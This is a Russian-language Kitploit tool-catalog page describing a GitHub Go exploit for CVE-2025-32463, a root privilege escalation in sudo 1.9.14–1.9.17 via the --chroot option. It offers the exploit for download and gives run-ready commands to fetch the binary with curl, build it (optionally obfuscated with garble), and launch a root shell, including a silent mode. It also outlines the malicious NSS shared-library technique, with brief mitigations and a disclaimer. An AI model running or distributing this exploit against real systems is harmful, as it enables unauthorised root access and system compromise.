Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32463 — Эта CVE описывает уязвимость в версиях sudo с 1.9.14 по 1.9.17, позволяющую несанкционированное локальное повышение привилегий до доступа root. | Kitploit
Инструменты/GitHubGitHub/nowafen/cve-2025-32463
Повышение привилегийАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubnowafen/cve-2025-32463

CVE-2025-32463

Эта CVE описывает уязвимость в версиях sudo с 1.9.14 по 1.9.17, позволяющую несанкционированное локальное повышение привилегий до доступа root.

Репозиторий
2621 месяц назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт CVE-2025-32463

GitHub stars GitHub license

Обзор

Этот репозиторий предоставляет инструмент эксплойта на Go для CVE-2025-32463, критической уязвимости локального повышения привилегий (CVSS 9.3) в sudo версиях 1.9.14–1.9.17. Она позволяет неавторизованным локальным пользователям получить root-доступ, эксплуатируя ошибку в опции --chroot (-R).

⚠️ Предупреждение: Только для образовательных и тестовых целей. Используйте в изолированных средах (например, ВМ). Не для злонамеренного использования.

Детали уязвимости

  • CVE ID: CVE-2025-32463
  • Затронутые версии: sudo 1.9.14–1.9.17
  • Воздействие: локальное повышение привилегий до root
  • Описание: Эксплойт манипулирует средой chroot для загрузки вредоносной общей библиотеки, устанавливая UID/GID в 0 и запуская root-шелл.

Предварительные требования

  • Go 1.2+
  • gcc
  • libc-dev
  • Уязвимая версия sudo
  • Непривилегированный пользователь с доступом к sudo и правами на --chroot

Быстрый старт

Загрузка готового бинарника

root@kitploit:~
curl -L https://github.com/Nowafen/CVE-2025-32463/releases/download/exploit/exploit -o exploit
chmod +x exploit
./exploit --execution  # Запускает root-шелл

Сборка из исходников

root@kitploit:~
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
go build -o exploit  # Или используйте garble для обфускации
./exploit --execution

Использование

КомандаОписание
./exploit --helpПоказать справку по использованию
./exploit --about

Проверка: В root-шелле выполните id (должен показать uid=0(root)) или whoami (должен показать root).

Как это работает (общее описание)

  1. Создаёт временную директорию /tmp/sudowoot.stage.*
  2. Генерирует вредоносный C-код (woot1337.c) для root-шелла
  3. Настраивает фейковый chroot с конфигурацией NSS
  4. Компилирует в общую библиотеку (libnss_/woot1337.so.2)
  5. Запускает sudo -R woot woot для загрузки библиотеки и повышения привилегий
  6. Автоматически удаляет временные файлы

Меры по смягчению

  • Обновите sudo до последней версии
  • Отключите chroot: добавьте Defaults !use_chroot в /etc/sudoers

Ссылки

  • Запись NVD

Отказ от ответственности

Этот инструмент предназначен для исследований в области безопасности. Автор не несёт ответственности за неправомерное использование. Всегда тестируйте ответственно.


Создано MNM

Скачать инструмент
Показать сведения о CVE
./exploit --executionЗапустить эксплойт (открывает root-шелл)
./exploit --execution --silentВыполнение в тихом режиме